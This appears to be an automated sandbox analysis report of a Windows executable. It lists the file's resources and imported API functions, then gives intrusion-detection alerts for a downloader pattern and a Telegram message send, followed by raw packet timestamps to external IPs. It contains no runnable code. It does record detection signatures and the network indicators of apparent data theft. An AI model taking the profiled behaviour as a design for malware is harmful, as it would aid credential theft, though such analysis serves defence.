                                                                                                              RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                              RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                              RT_ICON0xc77d00xe23PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8623929262227135
                                                                                                              RT_MENU0xc85f40x50dataEnglishGreat Britain0.9
                                                                                                              RT_STRING0xc86440x594dataEnglishGreat Britain0.3333333333333333
                                                                                                              RT_STRING0xc8bd80x68adataEnglishGreat Britain0.2747909199522103
                                                                                                              RT_STRING0xc92640x490dataEnglishGreat Britain0.3715753424657534
                                                                                                              RT_STRING0xc96f40x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                              RT_STRING0xc9cf00x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                              RT_STRING0xca34c0x466dataEnglishGreat Britain0.3605683836589698
                                                                                                              RT_STRING0xca7b40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                              RT_RCDATA0xca90c0x2fe5ddata1.0003364102982328
                                                                                                              RT_GROUP_ICON0xfa76c0x14dataEnglishGreat Britain1.2
                                                                                                              RT_GROUP_ICON0xfa7800x14dataEnglishGreat Britain1.25
                                                                                                              RT_GROUP_ICON0xfa7940x14dataEnglishGreat Britain1.15
                                                                                                              RT_GROUP_ICON0xfa7a80x14dataEnglishGreat Britain1.25
                                                                                                              RT_VERSION0xfa7bc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                              RT_MANIFEST0xfa8980x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                              DLLImport
                                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                              UxTheme.dllIsThemeActive
                                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishGreat Britain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-10T23:19:17.027297+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649716132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:17.996068+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649716132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:18.688114+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649728104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:19.449161+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649734132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:20.066545+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649740104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:26.879099+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649794104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:28.190658+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649807104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:29.119581+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.649811149.154.167.220443TCP
                                                                                                              2025-01-10T23:19:32.058579+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649826132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:32.996111+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649826132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:33.598886+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649841104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:34.355465+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649845132.226.247.7380TCP
                                                                                                              2025-01-10T23:19:34.910911+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649851104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:40.191886+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649893104.21.32.1443TCP
                                                                                                              2025-01-10T23:19:43.713922+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.661868149.154.167.220443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 23:19:16.078361034 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:16.084445000 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:16.084522963 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:16.084886074 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:16.089617014 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:16.757812023 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:16.762742996 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:16.767633915 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:16.972708941 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.027297020 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:17.040163994 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.040203094 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.042181969 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.049207926 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.049225092 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.553848982 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.554229975 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.556942940 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.556950092 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.557411909 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.605415106 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.606704950 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.647330046 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.730053902 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.730217934 CET44349722104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.730268002 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.737862110 CET49722443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.741214991 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:17.746170998 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.949717045 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.952092886 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.952145100 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.952235937 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.952490091 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:17.952505112 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.996068001 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.540534973 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.543248892 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:18.543286085 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.688169003 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.688330889 CET44349728104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.688385963 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:18.688719034 CET49728443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:18.692174911 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.693103075 CET4973480192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.697221994 CET8049716132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.697308064 CET4971680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.697887897 CET8049734132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:18.698031902 CET4973480192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.698031902 CET4973480192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:18.703008890 CET8049734132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:19.403620005 CET8049734132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:19.411602974 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:19.411669970 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:19.411744118 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:19.412010908 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:19.412029028 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:19.449161053 CET4973480192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:19.914982080 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:19.916640997 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:19.916677952 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.066543102 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.066632032 CET44349740104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.066929102 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:20.067168951 CET49740443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:20.071379900 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:20.076371908 CET8049746132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.076472044 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:20.076575041 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:20.081425905 CET8049746132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.768685102 CET8049746132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.770207882 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:20.770243883 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.770415068 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:20.770816088 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:20.770828962 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:20.808566093 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.248460054 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.251149893 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:21.251163960 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.398843050 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.398997068 CET44349752104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.399302006 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:21.399458885 CET49752443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:21.402707100 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.403778076 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.407747030 CET8049746132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.408395052 CET4974680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.408621073 CET8049756132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:21.408735037 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.408927917 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:21.413667917 CET8049756132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.123766899 CET8049756132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.124989986 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.125076056 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.125149965 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.125381947 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.125415087 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.167905092 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.618340969 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.623908043 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.623991013 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.777635098 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.777800083 CET44349760104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.777896881 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.778455973 CET49760443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:22.781810045 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.782550097 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.786838055 CET8049756132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.786897898 CET4975680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.787370920 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:22.787441015 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.787517071 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:22.792354107 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.523907900 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.525243044 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525290012 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.525377035 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525594950 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525610924 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.574170113 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.030369997 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.032893896 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.032938957 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176331997 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176409960 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176543951 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.177028894 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.180433989 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.180994034 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185513020 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.185581923 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185815096 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.185887098 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185946941 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.190680027 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.873136997 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.874922037 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.874959946 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.875123978 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.875422955 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.875432968 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.919091940 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.387041092 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.388978004 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.389005899 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534141064 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534288883 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534354925 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.534833908 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.538960934 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.539365053 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.543952942 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.544168949 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.544363022 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.544445992 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.544930935 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.549242020 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.244102955 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.245354891 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245410919 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.245662928 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245956898 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245986938 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.292922020 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.708710909 CET44349794104.21.32.1192.168.2.6
